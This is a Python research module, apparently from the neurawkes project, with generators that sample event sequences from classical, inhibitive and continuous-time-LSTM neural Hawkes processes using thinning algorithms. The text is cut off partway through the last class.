| 0.150679
| 0.090927
| 0.758393
| 0.742206
| 0.677758
| 0.542966
| 0.307454
| 0.098321
| 0
| 0.054082
| 0.018635
| 12,718
| 8
| 12,439
| 1,589.75
| 0.747777
| 0.005976
| 0
| 0
| 0
| 22
| 0.927045
| 0.920082
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
444e975a0c4fb13e72c462d983b88bade759c75d
| 141,070
|
py
|
Python
|
modules/sequence_generators.py
|
ZhaozhiQIAN/neurawkes
|
1a3caa837b34f77ac9d078bc9bf10ff10a3bf959
|
[
"MIT"
] | null | null | null |
modules/sequence_generators.py
|
ZhaozhiQIAN/neurawkes
|
1a3caa837b34f77ac9d078bc9bf10ff10a3bf959
|
[
"MIT"
] | null | null | null |
modules/sequence_generators.py
|
ZhaozhiQIAN/neurawkes
|
1a3caa837b34f77ac9d078bc9bf10ff10a3bf959
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Here are the sequence generators
including LSTM generator and Hawkes generator
@author: hongyuan
"""
import pickle
import time
import numpy
import theano
from theano import sandbox
import theano.tensor as tensor
import os
#import scipy.io
from collections import defaultdict
from theano.tensor.shared_randomstreams import RandomStreams
import utils
import struct
dtype=theano.config.floatX
class HawkesGen(object):
'''
here is the sequence generator using Hawkes process
'''
def __init__(self, settings):
'''
we follow the definition of multivariate Hawkes process
mu is the base intensity and
alpha is the effect matrix and
delta is the decay matrix
we randomly sample mu, alpha, delta
'''
self.args = settings['args']
self.sum_for_time = settings['sum_for_time']
numpy.random.seed(
settings['seed_random']
)
print("initializing ... ")
if settings['path_pre_train'] == None:
self.dim_process = settings['dim_process']
self.mu = numpy.float32(
numpy.random.uniform(
low=0.0, high=1.0,
size=(self.dim_process,)
)
)
self.alpha = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_process, self.dim_process)
)
)
self.delta = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_process, self.dim_process)
)
)
else:
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.mu = model_pre_train['mu']
self.alpha = model_pre_train['alpha']
self.delta = model_pre_train['delta']
#self.intensity = numpy.copy(self.mu)
self.name = 'HawkesGen'
#
self.intensity = numpy.copy(self.mu)
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("done ")
#
#
def set_params(self):
print("set the params for missing data experiments ... ")
self.dim_process = numpy.int32(4)
self.mu = numpy.float32(
numpy.ones((self.dim_process, ))
)
self.alpha = numpy.float32(
numpy.array(
[
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0]
]
)
)
self.delta = numpy.float32(
numpy.array(
[
[1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0],
[1.0, 1.0, 1.0, 1.0]
]
)
)
#
def set_args(self, dict_args):
self.args = dict_args
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'alpha': numpy.copy(self.alpha),
'delta': numpy.copy(self.delta),
'dim_process': self.dim_process,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity = numpy.copy(self.mu)
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
# initiliaze with mu
# we do not neet to check
# if time_current exceeds the sequence
# since it is automatically garanteed
self.intensity = numpy.copy(self.mu)
for event in self.one_seq:
time_since_start = event['time_since_start']
#if time_current > time_since_start:
# if this event is counted as * past event *
type_event = event['type_event']
change_time = time_current - time_since_start
decay_frac = numpy.exp(
-self.delta[:, type_event] * change_time
)
# self.intensity += self.alpha[:, idx_to_occur]
self.intensity += numpy.copy(
self.alpha[:, type_event] * decay_frac
)
# intensity computation is finished
#
#
#
# we can try using another method to sample data, which is quicker
# we can first sample a point with rate \sum \lambda
# and then sample the type based on the \lambda_k
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
self.compute_intensity_given_past(time_current)
intensity_hazard = numpy.copy(
self.intensity[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
# this snippet below is for adaptive thining
# it can speed things up
# by decreasing upper bound
# but it is closed when data is randomly generated at the beginning of this project
intensity_hazard = numpy.copy(
self.intensity[type_event]
)
#
return time_current
#
#
#
def sample_time_for_all_type(self):
# type_event is the type of event for which we want to sample the time
# it is k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
self.compute_intensity_given_past(time_current)
intensity_hazard = numpy.sum(self.intensity)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / numpy.sum(self.intensity)
# this snippet below is for adaptive thining
# it can speed things up
# by decreasing upper bound
# but it is toggled off when data is randomly generated at the beginning of this project
intensity_hazard = numpy.sum(self.intensity)
#
return time_current
#
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
#Liiniger (2009), p. 28, describes a "thinning algorithm":
#generate one event of each type, take the minimum,
#and discard the others.
#Details found in my paper write-up
#
#max_len is a pre-sampled value to set the length of seq
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_since_start_new, type_event_new = self.sample_one_event()
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
#
#
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class HawkesInhibGen(object):
'''
here is the sequence generator using Hawkes process with inhibition
'''
def __init__(self, settings):
'''
we follow the definition of multivariate Hawkes process
mu is the base intensity and
alpha is the effect matrix and
delta is the decay matrix
we randomly sample mu, alpha, delta
'''
print("initializing ... ")
self.args = settings['args']
self.sum_for_time = settings['sum_for_time']
numpy.random.seed(
settings['seed_random']
)
if settings['path_pre_train'] == None:
self.dim_process = settings['dim_process']
self.mu = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process,)
)
)
self.alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process, self.dim_process)
)
)
self.delta = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_process, self.dim_process)
)
)
else:
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.mu = model_pre_train['mu']
self.alpha = model_pre_train['alpha']
self.delta = model_pre_train['delta']
#self.intensity = numpy.copy(self.mu)
self.name = 'HawkesInhibGen'
#
self.intensity_tilde = numpy.copy(self.mu)
self.intensity = numpy.log(
numpy.float32(1.0) + numpy.exp(
self.intensity_tilde
)
)
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("done ")
#
#
#
#
def set_args(self, dict_args):
self.args = dict_args
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'alpha': numpy.copy(self.alpha),
'delta': numpy.copy(self.delta),
'dim_process': self.dim_process,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = numpy.copy(self.mu)
self.intensity = self.soft_relu(self.intensity_tilde)
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
# initiliaze with mu
self.intensity_tilde = numpy.copy(self.mu)
for event in self.one_seq:
time_since_start = event['time_since_start']
#if time_current > time_since_start:
# if this event is counted as * past event *
type_event = event['type_event']
change_time = time_current - time_since_start
decay_frac = numpy.exp(
-self.delta[:, type_event] * change_time
)
# self.intensity += self.alpha[:, idx_to_occur]
self.intensity_tilde += numpy.copy(
self.alpha[:, type_event] * decay_frac
)
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
self.intensity_tilde_ub = numpy.copy(
self.mu
)
# to speed up, this mu is not taken relu
# but it is still a upper bound
#self.hard_relu(
# self.mu
#)
for event in self.one_seq:
time_since_start = event['time_since_start']
#if time_current > time_since_start:
type_event = event['type_event']
change_time = time_current - time_since_start
decay_frac = numpy.exp(
-self.delta[:, type_event] * change_time
)
self.intensity_tilde_ub += numpy.copy(
self.hard_relu(
self.alpha[:, type_event]
) * decay_frac
)
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += ( E / intensity_hazard )
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
# for adaptive thinning,
# decrease the upper bound
# this is not used at the beginning of the project
# it is only used for sampling given pre-trained models
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
return time_current
#
#
def sample_time_for_all_type(self):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.sum(self.intensity_ub)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += ( E / intensity_hazard )
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / numpy.sum(self.intensity)
# for adaptive thinning,
# decrease the upper bound
# this is not used at the beginning of the project
# it is only used for sampling given pre-trained models
'''
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.sum(self.intensity_ub)
'''
return time_current
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_since_start_new, type_event_new = self.sample_one_event()
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesCTLSTM(object):
'''
here is the sequence generator
using Neural Hawkes process with continuous-time LSTM
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.sum_for_time = settings['sum_for_time']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
2 * self.dim_model,
7 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (7 * self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'NeuralHawkesGenCTLSTM'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
#self.hidden_t = numpy.zeros(
# (self.dim_model, ), dtype = dtype
#)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_target = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_decay = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.gate_output = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
print("initialization done ")
#
#
def set_args(self, dict_args):
self.args = dict_args
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
#self.hidden_t = numpy.zeros(
# (self.dim_model, ), dtype = dtype
#)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_target = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_decay = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.gate_output = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
#
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
# Note : for this event, we get its type
# and time elapsed since last event
# that is to say, this func is different than
# rnn_unit in models
# THERE : event, time_since_this_event_to_next
# so first update, and then decay
# HERE : time_since_last_event, event
# so first decay, and then update
# Note : this should be called
# after one event is generated and appended
# so the state is updated accordingly
#TODO: decay
cell_t_after_decay = self.cell_target + (
self.cell_t - self.cell_target
) * numpy.exp(
-self.cell_decay * self.one_seq[-1][
'time_since_last_event'
]
)
hidden_t_after_decay = self.gate_output * numpy.tanh(
cell_t_after_decay
)
#TODO: update
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, hidden_t_after_decay),
axis = 0
), self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:4*self.dim_model]
)
# 2 -- input_bar and forget_bar gates
gate_input_target = self.sigmoid(
post_transform[4*self.dim_model:5*self.dim_model]
)
gate_forget_target = self.sigmoid(
post_transform[5*self.dim_model:6*self.dim_model]
)
# cell memory decay
cell_decay = self.soft_relu(
post_transform[6*self.dim_model:]
)
#
cell_t = gate_forget * cell_t_after_decay + gate_input * gate_pre_c
cell_target = gate_forget_target * self.cell_target + gate_input_target * gate_pre_c
#
self.cell_t = numpy.copy(cell_t)
self.cell_target = numpy.copy(cell_target)
self.cell_decay = numpy.copy(cell_decay)
self.gate_output = numpy.copy(gate_output)
#
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
time_recent = self.one_seq[-1]['time_since_start']
#
cell_t_after_decay = self.cell_target + (
self.cell_t - self.cell_target
) * numpy.exp(
-self.cell_decay * (
time_current - time_recent
)
)
hidden_t_after_decay = self.gate_output * numpy.tanh(
cell_t_after_decay
)
#
self.intensity_tilde = numpy.dot(
hidden_t_after_decay, self.W_alpha
)
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
# Note : this is very tricky !!!
# in decomposable process, finding upper bound is easy
# see B.3 in NIPS paper
# but in neural model
# it is not a combo of POSITIVE decreasing funcs
# So how to do this?
# we find the functon is a sum of temrs
# some terms are decreasing, we keep them
# some terms are increasing, we get their upper-limit
#
# In detail, we compose it to 4 parts :
# (dc = c-c_target)
# w + dc - increasing
# w + dc + decreasing
# w - dc - decreasing
# w - dc + increasing
#
time_recent = self.one_seq[-1]['time_since_start']
#
cell_gap = self.cell_t - self.cell_target
cell_gap_matrix = numpy.outer(
cell_gap, numpy.ones(
(self.dim_process, ), dtype=dtype
)
)
# dim * dim_process
index_increasing_0 = (cell_gap_matrix > 0.0) & (self.W_alpha < 0.0)
index_increasing_1 = (cell_gap_matrix < 0.0) & (self.W_alpha > 0.0)
#
cell_gap_matrix[
index_increasing_0
] = numpy.float32(0.0)
cell_gap_matrix[
index_increasing_1
] = numpy.float32(0.0)
#
cell_t_after_decay = numpy.outer(
self.cell_target, numpy.ones(
(self.dim_process, ), dtype=dtype
)
) + cell_gap_matrix * numpy.exp(
-numpy.outer(
self.cell_decay, numpy.ones(
(self.dim_process, ), dtype=dtype
)
) * (
time_current - time_recent
)
)
hidden_t_after_decay = numpy.outer(
self.gate_output, numpy.ones(
(self.dim_process, ), dtype=dtype
)
) * numpy.tanh(cell_t_after_decay)
#
self.intensity_tilde_ub = numpy.sum(
hidden_t_after_decay * self.W_alpha,
axis=0
)
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
#
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
'''
return time_current
#
#
#
def sample_time_for_all_type(self):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.sum(self.intensity_ub)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / numpy.sum(self.intensity)
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.sum(self.intensity_ub)
'''
return time_current
#
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in NIPS 17 Appendix
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
time_since_start_new, type_event_new = self.sample_one_event()
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
